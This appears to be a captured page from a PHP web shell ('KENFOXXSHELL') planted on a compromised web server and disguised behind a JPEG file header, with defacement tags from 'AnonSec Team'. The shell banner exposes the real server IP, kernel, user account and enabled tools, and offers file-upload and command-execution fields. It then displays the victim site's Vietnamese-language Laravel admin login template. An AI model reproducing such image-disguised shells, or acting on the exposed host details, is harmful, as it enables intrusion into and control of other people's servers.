JFIFHHC     C  " 5????! ??? Donat Was Here
KENFOXXSHELL
Server IP : 160.25.81.117  /  Your IP : 216.73.216.137
Web Server : Apache/2
System : Linux sv05.hilab.cloud 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : bellizen ( 1045)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/bellizen/public_html/vaoday/resources/views/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/bellizen/public_html/vaoday/resources/views/admin/login.blade.php
<!DOCTYPE html>

<html>

  <head>

    <meta charset="utf-8">

    <meta http-equiv="X-UA-Compatible" content="IE=edge">

    <title>AdminLTE 2 | Log in</title>

    <!-- Tell the browser to be responsive to screen width -->

    <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">

    <!-- Bootstrap 3.3.5 -->

    <link rel="stylesheet" href="{{ url('public/admin_assets/bootstrap/css/bootstrap.min.css') }}">

    <!-- Font Awesome -->

    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css">

    <!-- Ionicons -->

    <link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css">

    <!-- Theme style -->

    <link rel="stylesheet" href="{{ url('public/admin_assets/dist/css/AdminLTE.min.css') }}">

    <!-- iCheck -->

    <link rel="stylesheet" href="{{ url('public/admin_assets/plugins/iCheck/square/blue.css') }}">



    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->

    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->

    <!--[if lt IE 9]>

        <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>

        <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>

    <![endif]-->

  </head>

  <body class="hold-transition login-page">

    <div class="login-box">

      <div class="login-logo">

        <div class="page-icon animated bounceInDown">

             <i class="glyphicon glyphicon-user"></i>

        </div>

        <a href="admin"><b>Quản trị</b></a>

      </div><!-- /.login-logo -->

      <div class="login-box-body">

        @if(count($errors) > 0)

        @foreach($errors ->all() as $error)

        <p class="login-box-msg">
 
          {!! $error !!}

        </p>

        @endforeach

        @endif

        <form action="" method="post">

          <input type="hidden" name="_token" value="{!! csrf_token() !!}" />

          <div class="form-group has-feedback">

            <input type="text" name="user" class="form-control" placeholder="User name">

            <span class="glyphicon glyphicon-envelope form-control-feedback"></span>

          </div>

          <div class="form-group has-feedback">

            <input type="password" name="password" class="form-control" placeholder="Password">

            <span class="glyphicon glyphicon-lock form-control-feedback"></span>

          </div>

          <div class="row">

            <div class="col-xs-6">

              <button type="submit" class="btn btn-primary btn-block btn-flat">Ðăng nhập</button>

            </div><!-- /.col -->

            <div class="col-xs-6">

              <div class="checkbox icheck">

                <label>

                  <input type="checkbox"> Luu tài khoản

                </label>

              </div>

            </div><!-- /.col -->

            

          </div>

        </form>




        <a href="{{ url('quen-mat-khau') }}">Quên mật khẩu</a><br/>

 
      </div><!-- /.login-box-body -->

    </div><!-- /.login-box -->



    <!-- jQuery 2.1.4 -->

    <script src="{{ url('public/admin_assets/plugins/jQuery/jQuery-2.1.4.min.js') }}"></script>

    <!-- Bootstrap 3.3.5 -->

    <script src="{{ url('public/admin_assets/bootstrap/js/bootstrap.min.js') }}"></script>

    <!-- iCheck -->

    <script src="{{ url('public/admin_assets/plugins/iCheck/icheck.min.js') }}"></script>

    <script>

      $(function () {

        $('input').iCheck({

          checkboxClass: 'icheckbox_square-blue',

          radioClass: 'iradio_square-blue',

          increaseArea: '20%' // optional

        });

      });

    </script>

  </body>

</html>


Anon7 - 2022
AnonSec Team